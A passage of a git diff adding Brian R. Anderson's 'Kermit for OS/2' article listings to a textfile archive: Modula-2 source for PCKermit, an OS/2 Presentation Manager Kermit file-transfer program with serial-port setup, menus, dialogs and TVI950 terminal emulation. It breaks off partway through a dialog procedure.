I can be reached through AMIGA/INFO BBS @ (215) 430-3969 + + GOOD LUCK Rich Frantz + + diff --git a/textfiles.com/computers/anderson.asc b/textfiles.com/computers/anderson.asc new file mode 100644 index 00000000..8e736a9e --- /dev/null +++ b/textfiles.com/computers/anderson.asc @@ -0,0 +1,4077 @@ +_KERMIT FOR OS/2_ +by Brian R. Anderson + +[LISTING ONE] + + +MODULE PCKermit; +(**************************************************************************) +(* *) +(* PCKermit -- by Brian R. Anderson *) +(* Copyright (c) 1990 *) +(* *) +(* PCKermit is an implementation of the Kermit file transfer protocol *) +(* developed at Columbia University. This (OS/2 PM) version is a *) +(* port from the DOS version of Kermit that I wrote two years ago. *) +(* My original DOS version appeared in the May 1989 issue of DDJ. *) +(* *) +(* The current version includes emulation of the TVI950 Video Display *) +(* Terminal for interaction with IBM mainframes (through the IBM 7171). *) +(* *) +(**************************************************************************) + + FROM SYSTEM IMPORT + ADR; + + FROM OS2DEF IMPORT + HAB, HWND, HPS, NULL, ULONG; + + FROM PMWIN IMPORT + MPFROM2SHORT, HMQ, QMSG, CS_SIZEREDRAW, WS_VISIBLE, FS_ICON, + FCF_TITLEBAR, FCF_SYSMENU, FCF_SIZEBORDER, FCF_MINMAX, FCF_ACCELTABLE, + FCF_SHELLPOSITION, FCF_TASKLIST, FCF_MENU, FCF_ICON, + SWP_MOVE, SWP_SIZE, SWP_MAXIMIZE, + HWND_DESKTOP, FID_SYSMENU, SC_CLOSE, MIA_DISABLED, MM_SETITEMATTR, + WinInitialize, WinCreateMsgQueue, WinGetMsg, WinDispatchMsg, WinSendMsg, + WinRegisterClass, WinCreateStdWindow, WinDestroyWindow, WinWindowFromID, + WinDestroyMsgQueue, WinTerminate, WinSetWindowText, + WinSetWindowPos, WinQueryWindowPos; + + FROM KH IMPORT + IDM_KERMIT; + + FROM Shell IMPORT + Class, Title, Child, WindowProc, ChildWindowProc, + FrameWindow, ClientWindow, SetPort, Pos; + + + CONST + QUEUE_SIZE = 1024; (* Large message queue for async events *) + + VAR + AnchorBlock : HAB; + MessageQueue : HMQ; + Message : QMSG; + FrameFlags : ULONG; + hsys : HWND; + + +BEGIN (* main *) + AnchorBlock := WinInitialize(0); + + IF AnchorBlock # 0 THEN + MessageQueue := WinCreateMsgQueue (AnchorBlock, QUEUE_SIZE); + + IF MessageQueue # 0 THEN + (* Register the parent window class *) + WinRegisterClass ( + AnchorBlock, + ADR (Class), + WindowProc, + CS_SIZEREDRAW, 0); + + (* Register a child window class *) + WinRegisterClass ( + AnchorBlock, + ADR (Child), + ChildWindowProc, + CS_SIZEREDRAW, 0); + + (* Create a standard window *) + FrameFlags := FCF_TITLEBAR + FCF_MENU + FCF_MINMAX + + FCF_SYSMENU + FCF_SIZEBORDER + FCF_TASKLIST + + FCF_ICON + FCF_SHELLPOSITION + FCF_ACCELTABLE; + + FrameWindow := WinCreateStdWindow ( + HWND_DESKTOP, (* handle of the parent window *) + WS_VISIBLE + FS_ICON, (* the window style *) + FrameFlags, (* the window flags *) + ADR(Class), (* the window class *) + NULL, (* the title bar text *) + WS_VISIBLE, (* client window style *) + NULL, (* handle of resource module *) + IDM_KERMIT, (* resource id *) + ClientWindow (* returned client window handle *) + ); + + IF FrameWindow # 0 THEN + (* Disable the CLOSE item on the system menu *) + hsys := WinWindowFromID (FrameWindow, FID_SYSMENU); + WinSendMsg (hsys, MM_SETITEMATTR, + MPFROM2SHORT (SC_CLOSE, 1), + MPFROM2SHORT (MIA_DISABLED, MIA_DISABLED)); + + (* Expand Window to Nearly Full Size, And Display the Title *) + WinQueryWindowPos (HWND_DESKTOP, ADR (Pos)); + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE); + WinSetWindowText (FrameWindow, ADR (Title)); + + SetPort; (* Try to initialize communications port *) + + WHILE WinGetMsg(AnchorBlock, Message, NULL, 0, 0) # 0 DO + WinDispatchMsg(AnchorBlock, Message); + END; + + WinDestroyWindow(FrameWindow); + END; + WinDestroyMsgQueue(MessageQueue); + END; + WinTerminate(AnchorBlock); + END; +END PCKermit. + +[LISTING TWO] + +DEFINITION MODULE Shell; + + FROM OS2DEF IMPORT + USHORT, HWND; + + FROM PMWIN IMPORT + MPARAM, MRESULT, SWP; + + EXPORT QUALIFIED + Class, Child, Title, FrameWindow, ClientWindow, + ChildFrameWindow, ChildClientWindow, Pos, SetPort, + WindowProc, ChildWindowProc; + + CONST + Class = "PCKermit"; + Child ="Child"; + Title = "PCKermit -- Microcomputer to Mainframe Communications"; + + + VAR + FrameWindow : HWND; + ClientWindow : HWND; + ChildFrameWindow : HWND; + ChildClientWindow : HWND; + Pos : SWP; (* Screen Dimensions: position & size *) + comport : CARDINAL; + + + PROCEDURE SetPort; + + PROCEDURE WindowProc ['WindowProc'] ( + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + + PROCEDURE ChildWindowProc ['ChildWindowProc'] ( + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + +END Shell. + + +[LISTING THREE] + +DEFINITION MODULE Term; (* TVI950 Terminal Emulation For Kermit *) + + EXPORT QUALIFIED + WM_TERM, WM_TERMQUIT, + Dir, TermThrProc, InitTerm, PutKbdChar, PutPortChar; + + CONST + WM_TERM = 4000H; + WM_TERMQUIT = 4001H; + + + PROCEDURE Dir (path : ARRAY OF CHAR); + (* Displays a directory *) + + PROCEDURE TermThrProc; + (* Thread to get characters from port, put into buffer, send message *) + + PROCEDURE InitTerm; + (* Clear Screen, Home Cursor, Get Ready For Terminal Emulation *) + + PROCEDURE PutKbdChar (ch1, ch2 : CHAR); + (* Process a character received from the keyboard *) + + PROCEDURE PutPortChar (ch : CHAR); + (* Process a character received from the port *) + +END Term. + + + +[LISTING FOUR] + +DEFINITION MODULE Screen; +(* Module to perform "low level" screen functions (via AVIO) *) + + FROM PMAVIO IMPORT + HVPS; + + EXPORT QUALIFIED + NORMAL, HIGHLIGHT, REVERSE, attribute, ColorSet, hvps, + White, Green, Amber, Color1, Color2, + ClrScr, ClrEol, GotoXY, GetXY, + Right, Left, Up, Down, Write, WriteLn, WriteString, + WriteInt, WriteHex, WriteAtt; + + + VAR + NORMAL : CARDINAL; + HIGHLIGHT : CARDINAL; + REVERSE : CARDINAL; + attribute : CARDINAL; + ColorSet : CARDINAL; + hvps : HVPS; (* presentation space used by screen module *) + + + PROCEDURE White; + (* Sets up colors: Monochrome White *) + + PROCEDURE Green; + (* Sets up colors: Monochrome Green *) + + PROCEDURE Amber; + (* Sets up colors: Monochrome Amber *) + + PROCEDURE Color1; + (* Sets up colors: Blue, Red, Green *) + + PROCEDURE Color2; + (* Sets up colors: Green, Magenta, Cyan *) + + PROCEDURE ClrScr; + (* Clear the screen, and home the cursor *) + + PROCEDURE ClrEol; + (* clear from the current cursor position to the end of the line *) + + PROCEDURE Right; + (* move cursor to the right *) + + PROCEDURE Left; + (* move cursor to the left *) + + PROCEDURE Up; + (* move cursor up *) + + PROCEDURE Down; + (* move cursor down *) + + PROCEDURE GotoXY (col, row : CARDINAL); + (* position cursor at column, row *) + + PROCEDURE GetXY (VAR col, row : CARDINAL); + (* determine current cursor position *) + + PROCEDURE Write (c : CHAR); + (* Write a Character, Teletype Mode *) + + PROCEDURE WriteString (str : ARRAY OF CHAR); + (* Write String, Teletype Mode *) + + PROCEDURE WriteInt (n : INTEGER; s : CARDINAL); + (* Write Integer, Teletype Mode *) + + PROCEDURE WriteHex (n, s : CARDINAL); + (* Write a Hexadecimal Number, Teletype Mode *) + + PROCEDURE WriteLn; + (* Write , Teletype Mode *) + + PROCEDURE WriteAtt (c : CHAR); + (* write character and attribute at cursor position *) + +END Screen. + +[LISTING FIVE] + +DEFINITION MODULE PAD; (* Packet Assembler/Disassembler for Kermit *) + + FROM PMWIN IMPORT + MPARAM; + + EXPORT QUALIFIED + WM_PAD, PAD_Quit, PAD_Error, PacketType, yourNPAD, yourPADC, yourEOL, + Aborted, sFname, Send, Receive, DoPADMsg; + + CONST + WM_PAD = 5000H; + PAD_Quit = 0; + PAD_Error = 20; + + TYPE + (* PacketType used in both PAD and DataLink modules *) + PacketType = ARRAY [1..100] OF CHAR; + + VAR + (* yourNPAD, yourPADC, and yourEOL used in both PAD and DataLink *) + yourNPAD : CARDINAL; (* number of padding characters *) + yourPADC : CHAR; (* padding characters *) + yourEOL : CHAR; (* End Of Line -- terminator *) + sFname : ARRAY [0..20] OF CHAR; + Aborted : BOOLEAN; + + PROCEDURE Send; + (* Sends a file after prompting for filename *) + + PROCEDURE Receive; + (* Receives a file (or files) *) + + PROCEDURE DoPADMsg (mp1, mp2 : MPARAM); + (* Output messages for Packet Assembler/Disassembler *) + +END PAD. + + +[LISTING SIX] + +DEFINITION MODULE DataLink; (* Sends and Receives Packets for PCKermit *) + + FROM PMWIN IMPORT + MPARAM; + + FROM PAD IMPORT + PacketType; + + EXPORT QUALIFIED + WM_DL, FlushUART, SendPacket, ReceivePacket, DoDLMsg; + + CONST + WM_DL = 6000H; + + PROCEDURE FlushUART; + (* ensure no characters left in UART holding registers *) + + PROCEDURE SendPacket (s : PacketType); + (* Adds SOH and CheckSum to packet *) + + PROCEDURE ReceivePacket (VAR r : PacketType) : BOOLEAN; + (* strips SOH and checksum -- returns status: TRUE= good packet *) + (* received; FALSE = timed out waiting for packet or checksum error *) + + PROCEDURE DoDLMsg (mp1, mp2 : MPARAM); + (* Process DataLink Messages *) + +END DataLink. + + +[LISTING SEVEN] + +(*************************************************************) +(* *) +(* Copyright (C) 1988, 1989 *) +(* by Stony Brook Software *) +(* *) +(* All rights reserved. *) +(* *) +(*************************************************************) + +DEFINITION MODULE CommPort; + + TYPE + CommStatus = ( + Success, + InvalidPort, + InvalidParameter, + AlreadyReceiving, + NotReceiving, + NoCharacter, + FramingError, + OverrunError, + ParityError, + BufferOverflow, + TimeOut + ); + + BaudRate = ( + Baud110, + Baud150, + Baud300, + Baud600, + Baud1200, + Baud2400, + Baud4800, + Baud9600, + Baud19200 + ); + + DataBits = [7..8]; + StopBits = [1..2]; + Parity = (Even, Odd, None); + + + PROCEDURE InitPort(port : CARDINAL; speed : BaudRate; data : DataBits; + stop : StopBits; check : Parity) : CommStatus; + + PROCEDURE StartReceiving(port, bufsize : CARDINAL) : CommStatus; + + PROCEDURE StopReceiving(port : CARDINAL) : CommStatus; + + PROCEDURE GetChar(port : CARDINAL; VAR ch : CHAR) : CommStatus; + + PROCEDURE SendChar(port : CARDINAL; ch : CHAR; modem : BOOLEAN) : CommStatus; + +END CommPort. + + +[LISTING EIGHT] + +DEFINITION MODULE Files; (* File I/O for Kermit *) + + FROM FileSystem IMPORT + File; + + EXPORT QUALIFIED + Status, FileType, Open, Create, CloseFile, Get, Put, DoWrite; + + TYPE + Status = (Done, Error, EOF); + FileType = (Input, Output); + + PROCEDURE Open (VAR f : File; name : ARRAY OF CHAR) : Status; + (* opens an existing file for reading, returns status *) + + PROCEDURE Create (VAR f : File; name : ARRAY OF CHAR) : Status; + (* creates a new file for writing, returns status *) + + PROCEDURE CloseFile (VAR f : File; Which : FileType) : Status; + (* closes a file after reading or writing *) + + PROCEDURE Get (VAR f : File; VAR ch : CHAR) : Status; + (* Reads one character from the file, returns status *) + + PROCEDURE Put (ch : CHAR); + (* Writes one character to the file buffer *) + + PROCEDURE DoWrite (VAR f : File) : Status; + (* Writes buffer to disk only if nearly full *) + +END Files. + + + +[LISTING NINE] + +IMPLEMENTATION MODULE Shell; + + FROM SYSTEM IMPORT + ADDRESS, ADR; + + IMPORT ASCII; + + FROM OS2DEF IMPORT + LOWORD, HIWORD, HWND, HDC, HPS, RECTL, USHORT, NULL, ULONG; + + FROM Term IMPORT + WM_TERM, WM_TERMQUIT, + Dir, TermThrProc, InitTerm, PutKbdChar, PutPortChar; + + FROM PAD IMPORT + WM_PAD, PAD_Quit, PAD_Error, DoPADMsg, Aborted, sFname, Send, Receive; + + FROM DataLink IMPORT + WM_DL, DoDLMsg; + + FROM Screen IMPORT + hvps, ColorSet, White, Green, Amber, Color1, Color2, ClrScr, WriteLn; + + FROM DosCalls IMPORT + DosCreateThread, DosSuspendThread, DosResumeThread, DosSleep; + + FROM PMAVIO IMPORT + VioCreatePS, VioAssociate, VioDestroyPS, VioShowPS, WinDefAVioWindowProc, + FORMAT_CGA, HVPS; + + FROM PMWIN IMPORT + MPARAM, MRESULT, SWP, PSWP, + WS_VISIBLE, FCF_TITLEBAR, FCF_SIZEBORDER, FCF_SHELLPOSITION, + WM_SYSCOMMAND, WM_MINMAXFRAME, SWP_MINIMIZE, HWND_DESKTOP, + WM_PAINT, WM_QUIT, WM_COMMAND, WM_INITDLG, WM_CONTROL, WM_HELP, + WM_INITMENU, WM_SIZE, WM_DESTROY, WM_CREATE, WM_CHAR, + BM_SETCHECK, MBID_OK, MB_OK, MB_OKCANCEL, + KC_CHAR, KC_CTRL, KC_VIRTUALKEY, KC_KEYUP, + SWP_SIZE, SWP_MOVE, SWP_MAXIMIZE, SWP_RESTORE, + MB_ICONQUESTION, MB_ICONASTERISK, MB_ICONEXCLAMATION, + FID_MENU, MM_SETITEMATTR, MM_QUERYITEMATTR, + MIA_DISABLED, MIA_CHECKED, MPFROM2SHORT, + WinCreateStdWindow, WinDestroyWindow, + WinOpenWindowDC, WinSendMsg, WinQueryDlgItemText, WinInvalidateRect, + WinDefWindowProc, WinBeginPaint, WinEndPaint, WinQueryWindowRect, + WinSetWindowText, WinSetFocus, WinDlgBox, WinDefDlgProc, WinDismissDlg, + WinMessageBox, WinPostMsg, WinWindowFromID, WinSendDlgItemMsg, + WinSetWindowPos, WinSetActiveWindow; + + FROM PMGPI IMPORT + GpiErase; + + FROM KH IMPORT + IDM_KERMIT, IDM_FILE, IDM_OPTIONS, IDM_SENDFN, ID_SENDFN, + IDM_DIR, IDM_CONNECT, IDM_SEND, IDM_REC, IDM_DIRPATH, ID_DIRPATH, + IDM_DIREND, IDM_QUIT, IDM_ABOUT, IDM_HELPMENU, IDM_TERMHELP, + IDM_COMPORT, IDM_BAUDRATE, IDM_DATABITS, IDM_STOPBITS, IDM_PARITY, + COM_OFF, ID_COM1, ID_COM2, PARITY_OFF, ID_EVEN, ID_ODD, ID_NONE, + DATA_OFF, ID_DATA7, ID_DATA8, STOP_OFF, ID_STOP1, ID_STOP2, + BAUD_OFF, ID_B110, ID_B150, ID_B300, ID_B600, ID_B1200, ID_B2400, + ID_B4800, ID_B9600, ID_B19K2, + IDM_COLORS, IDM_WHITE, IDM_GREEN, IDM_AMBER, IDM_C1, IDM_C2; + + FROM CommPort IMPORT + CommStatus, BaudRate, DataBits, StopBits, Parity, InitPort, + StartReceiving, StopReceiving; + + FROM Strings IMPORT + Assign, Append, AppendChar; + + + CONST + WM_SETMAX = 7000H; + WM_SETFULL = 7001H; + WM_SETRESTORE = 7002H; + NONE = 0; (* no port yet initialized *) + STKSIZE = 4096; + BUFSIZE = 4096; (* Port receive buffers: room for two full screens *) + PortError = "Port Is Already In Use -- EXIT? (Cancel Trys Another Port)"; + ESC = 33C; + + + VAR + FrameFlags : ULONG; + TermStack : ARRAY [1..STKSIZE] OF CHAR; + Stack : ARRAY [1..STKSIZE] OF CHAR; + TermThr : CARDINAL; + Thr : CARDINAL; + hdc : HDC; + frame_hvps, child_hvps : HVPS; + TermMode : BOOLEAN; + Path : ARRAY [0..60] OF CHAR; + Banner : ARRAY [0..40] OF CHAR; + PrevComPort : CARDINAL; + Settings : ARRAY [0..1] OF RECORD + baudrate : CARDINAL; + databits : CARDINAL; + parity : CARDINAL; + stopbits : CARDINAL; + END; + + PROCEDURE SetFull; + (* Changes window to full size *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE); + END SetFull; + + + PROCEDURE SetRestore; + (* Changes window to full size FROM maximized *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE + SWP_RESTORE); + END SetRestore; + + + PROCEDURE SetMax; + (* Changes window to maximized *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE + SWP_MAXIMIZE); + END SetMax; + + + PROCEDURE SetBanner; + (* Displays Abbreviated Program Title + Port Settings in Title Bar *) + + CONST + PortName : ARRAY [0..1] OF ARRAY [0..5] OF CHAR = + [["COM1:", 0C], ["COM2:", 0C]]; + BaudName : ARRAY [0..8] OF ARRAY [0..5] OF CHAR = + [["110", 0C], ["150", 0C], ["300", 0C], + ["600", 0C], ["1200", 0C], ["2400", 0C], + ["4800", 0C], ["9600", 0C], ["19200", 0C]]; + ParityName : ARRAY [0..2] OF CHAR = ['E', 'O', 'N']; + + BEGIN + WITH Settings[comport - COM_OFF] DO + Assign (Class, Banner); + Append (Banner, " -- "); + Append (Banner, PortName[comport - COM_OFF]); + Append (Banner, BaudName[baudrate - BAUD_OFF]); + AppendChar (Banner, ','); + AppendChar (Banner, ParityName[parity - PARITY_OFF]); + AppendChar (Banner, ','); + AppendChar (Banner, CHR ((databits - DATA_OFF) + 30H)); + AppendChar (Banner, ','); + AppendChar (Banner, CHR ((stopbits - STOP_OFF) + 30H)); + WinSetWindowText (FrameWindow, ADR (Banner)); + END; + END SetBanner; + + + PROCEDURE SetPort; + (* Sets The Communications Parameters Chosen By User *) + + VAR + status : CommStatus; + rc : USHORT; + + BEGIN + IF PrevComPort # NONE THEN + StopReceiving (PrevComPort - COM_OFF); + END; + + WITH Settings[comport - COM_OFF] DO + status := InitPort ( + comport - COM_OFF, + BaudRate (baudrate - BAUD_OFF), + DataBits (databits - DATA_OFF), + StopBits (stopbits - STOP_OFF), + Parity (parity - PARITY_OFF), + ); + END; + + IF status = Success THEN + StartReceiving (comport - COM_OFF, BUFSIZE); + PrevComPort := comport; + ELSE + rc := WinMessageBox (HWND_DESKTOP, FrameWindow, ADR (PortError), + 0, 0, MB_OKCANCEL + MB_ICONEXCLAMATION); + IF rc = MBID_OK THEN + WinPostMsg (FrameWindow, WM_QUIT, 0, 0); + ELSE (* try the other port *) + IF comport = ID_COM1 THEN + comport := ID_COM2; + ELSE + comport := ID_COM1; + END; + SetPort; (* recursive call for retry *) + END; + END; + SetBanner; + END SetPort; + + + PROCEDURE MakeChild (msg : ARRAY OF CHAR); + (* Creates a child window for use by send or receive threads *) + + VAR + c_hdc : HDC; + + BEGIN + WinPostMsg (FrameWindow, WM_SETFULL, 0, 0); + + Disable (IDM_CONNECT); + Disable (IDM_SEND); + Disable (IDM_REC); + Disable (IDM_DIR); + Disable (IDM_OPTIONS); + Disable (IDM_COLORS); + + (* Create a client window *) + FrameFlags := FCF_TITLEBAR + FCF_SIZEBORDER; + + ChildFrameWindow := WinCreateStdWindow ( + ClientWindow, (* handle of the parent window *) + WS_VISIBLE, (* the window style *) + FrameFlags, (* the window flags *) + ADR(Child), (* the window class *) + NULL, (* the title bar text *) + WS_VISIBLE, (* client window style *) + NULL, (* handle of resource module *) + IDM_KERMIT, (* resource id *) + ChildClientWindow (* returned client window handle *) + ); + + WinSetWindowPos (ChildFrameWindow, 0, + Pos.cx DIV 4, Pos.cy DIV 4, + Pos.cx DIV 2, Pos.cy DIV 2 - 3, + SWP_MOVE + SWP_SIZE); + + WinSetWindowText (ChildFrameWindow, ADR (msg)); + + WinSetActiveWindow (HWND_DESKTOP, ChildFrameWindow); + + c_hdc := WinOpenWindowDC (ChildClientWindow); + hvps := child_hvps; + VioAssociate (c_hdc, hvps); + ClrScr; (* clear the hvio window *) + END MakeChild; + + + PROCEDURE Disable (item : USHORT); + (* Disables and "GREYS" a menu item *) + + VAR + h : HWND; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + WinSendMsg (h, MM_SETITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_DISABLED, MIA_DISABLED)); + END Disable; + + + PROCEDURE Enable (item : USHORT); + (* Enables a menu item *) + + VAR + h : HWND; + atr : USHORT; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + atr := USHORT (WinSendMsg (h, MM_QUERYITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_DISABLED, MIA_DISABLED))); + atr := USHORT (BITSET (atr) * (BITSET (MIA_DISABLED) / BITSET (-1))); + WinSendMsg (h, MM_SETITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_DISABLED, atr)); + END Enable; + + + PROCEDURE Check (item : USHORT); + (* Checks a menu item -- indicates that it is selected *) + + VAR + h : HWND; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + WinSendMsg (h, MM_SETITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_CHECKED, MIA_CHECKED)); + END Check; + + + PROCEDURE UnCheck (item : USHORT); + (* Remove check from a menu item *) + + VAR + h : HWND; + atr : USHORT; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + atr := USHORT (WinSendMsg (h, MM_QUERYITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_CHECKED, MIA_CHECKED))); + atr := USHORT (BITSET (atr) * (BITSET (MIA_CHECKED) / BITSET (-1))); + WinSendMsg (h, MM_SETITEMATTR, + MPFROM2SHORT (item, 1), + MPFROM2SHORT (MIA_CHECKED, atr)); + END UnCheck; + + + PROCEDURE DoMenu (hwnd : HWND; item : MPARAM); + (* Processes Most Menu Interactions *) + + VAR + rcl : RECTL; + rc : USHORT; + + BEGIN + CASE LOWORD (item) OF + IDM_DIR: + SetFull; + WinQueryWindowRect (hwnd, rcl); + WinDlgBox (HWND_DESKTOP, hwnd, PathDlgProc, 0, IDM_DIRPATH, 0); + hvps := frame_hvps; + VioAssociate (hdc, hvps); + Dir (Path); + WinDlgBox (HWND_DESKTOP, hwnd, DirEndDlgProc, 0, IDM_DIREND, 0); + VioAssociate (0, hvps); + WinInvalidateRect (hwnd, ADR (rcl), 0); + | IDM_CONNECT: + TermMode := TRUE; + Disable (IDM_CONNECT); + Disable (IDM_SEND); + Disable (IDM_REC); + Disable (IDM_DIR); + Disable (IDM_OPTIONS); + Disable (IDM_COLORS); + (* MAXIMIZE Window -- Required for Terminal Emulation *) + SetMax; + hvps := frame_hvps; + VioAssociate (hdc, hvps); + DosResumeThread (TermThr); + InitTerm; + | IDM_SEND: + WinDlgBox (HWND_DESKTOP, hwnd, SendFNDlgProc, 0, IDM_SENDFN, 0); + MakeChild ("Send a File"); + DosCreateThread (Send, Thr, ADR (Stack[STKSIZE])); + | IDM_REC: + MakeChild ("Receive a File"); + DosCreateThread (Receive, Thr, ADR (Stack[STKSIZE])); + | IDM_QUIT: + rc := WinMessageBox (HWND_DESKTOP, ClientWindow, + ADR ("Do You Really Want To EXIT PCKermit?"), + ADR ("End Session"), 0, MB_OKCANCEL + MB_ICONQUESTION); + IF rc = MBID_OK THEN + StopReceiving (comport - COM_OFF); + WinPostMsg (hwnd, WM_QUIT, 0, 0); + END; + | IDM_COMPORT: + WinDlgBox (HWND_DESKTOP, hwnd, ComDlgProc, 0, IDM_COMPORT, 0); + SetPort; + | IDM_BAUDRATE: + WinDlgBox (HWND_DESKTOP, hwnd, BaudDlgProc, 0, IDM_BAUDRATE, 0); + SetPort; + | IDM_DATABITS: + WinDlgBox (HWND_DESKTOP, hwnd, DataDlgProc, 0, IDM_DATABITS, 0); + SetPort; + | IDM_STOPBITS: + WinDlgBox (HWND_DESKTOP, hwnd, StopDlgProc, 0, IDM_STOPBITS, 0); + SetPort; + | IDM_PARITY: + WinDlgBox (HWND_DESKTOP, hwnd, ParityDlgProc, 0, IDM_PARITY, 0); + SetPort; + | IDM_WHITE: + UnCheck (ColorSet); + ColorSet := IDM_WHITE; + Check (ColorSet); + White; + | IDM_GREEN: + UnCheck (ColorSet); + ColorSet := IDM_GREEN; + Check (ColorSet); + Green; + | IDM_AMBER: + UnCheck (ColorSet); + ColorSet := IDM_AMBER; + Check (ColorSet); + Amber; + | IDM_C1: + UnCheck (ColorSet); + ColorSet := IDM_C1; + Check (ColorSet); + Color1; + | IDM_C2: + UnCheck (ColorSet); + ColorSet := IDM_C2; + Check (ColorSet); + Color2; + | IDM_ABOUT: + WinDlgBox (HWND_DESKTOP, hwnd, AboutDlgProc, 0, IDM_ABOUT, 0); + ELSE + (* Don't do anything... *) + END; + END DoMenu; + + + PROCEDURE ComDlgProc ['ComDlgProc'] ( + (* Process Dialog Box for choosing COM1/COM2 *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, comport, BM_SETCHECK, 1, 0); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, comport)); + RETURN 1; + | WM_CONTROL: + comport := LOWORD (mp1); + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END ComDlgProc; + + + PROCEDURE BaudDlgProc ['BaudDlgProc'] ( + (* Process Dialog Box for choosing Baud Rate *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, baudrate, BM_SETCHECK, 1, 0); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, baudrate)); + RETURN 1; + | WM_CONTROL: + baudrate := LOWORD (mp1); + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END BaudDlgProc; + + + PROCEDURE DataDlgProc ['DataDlgProc'] ( + (* Process Dialog Box for choosing 7 or 8 data bits *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, databits, BM_SETCHECK, 1, 0); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, databits)); + RETURN 1; + | WM_CONTROL: + databits := LOWORD (mp1); + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END DataDlgProc; + + + PROCEDURE StopDlgProc ['StopDlgProc'] ( + (* Process Dialog Box for choosing 1 or 2 stop bits *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, stopbits, BM_SETCHECK, 1, 0); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, stopbits)); + RETURN 1; + | WM_CONTROL: + stopbits := LOWORD (mp1); + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END StopDlgProc; + + + PROCEDURE ParityDlgProc ['ParityDlgProc'] ( + (* Process Dialog Box for choosing odd, even, or no parity *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, parity, BM_SETCHECK, 1, 0); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, parity)); + RETURN 1; + | WM_CONTROL: + parity := LOWORD (mp1); + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END ParityDlgProc; + + + PROCEDURE AboutDlgProc ['AboutDlgProc'] ( + (* Process "About" Dialog Box *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END AboutDlgProc; + + + PROCEDURE SendFNDlgProc ['SendFNDlgProc'] ( + (* Process Dialog Box that obtains send filename from user *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, ID_SENDFN)); + RETURN 1; + | WM_COMMAND: + WinQueryDlgItemText (hwnd, ID_SENDFN, 20, ADR (sFname)); + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END SendFNDlgProc; + + + PROCEDURE PathDlgProc ['PathDlgProc'] ( + (* Process Dialog Box that obtains directory path from user *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, ID_DIRPATH)); + 